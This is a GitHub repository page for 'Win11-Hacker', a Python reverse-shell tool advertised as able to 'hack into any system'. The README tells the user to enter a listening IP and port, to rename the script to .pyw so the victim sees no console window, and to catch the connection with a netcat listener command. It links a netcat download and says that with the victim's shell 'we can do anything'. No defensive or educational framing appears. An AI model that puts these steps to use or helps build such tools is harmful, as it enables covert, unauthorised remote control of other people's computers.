Skip to content

nijaskhan/Win11-Hacker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

Win11-Hacker

Hack into any system using this python code

In this code you only have to provide your listening ip address and port in the code shown in the below picture

Screenshot (62)

After giving the port number, you need to hide the console window to avoid unnecessary suspicion.

-- In order to hide the console window you need to rename the winHacker.py to winHacker.pyw

Attacker listening through netcat using command :

                               nc64.exe -nvlp 7878    ('7878' is the port number, you have to provide port number that given to the above code)

Screenshot (63)

DOWNLOAD NETCAT USNG THIS LINK : https://github.com/nijaskhan/Win11-Hacker/raw/main/netcat.zip

AN EXAMPLE WITH PICTURE OF GETTING A REVERSE CONNECTION FROM THE VICTIM :

Screenshot (64)

After getting access use the POWERSHELL commands. (WE CAN DO ANYTHING WITH THE SHELL) If you dont know powershell commands, then google the powershell commands.

About

Hack into any system using this python code

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages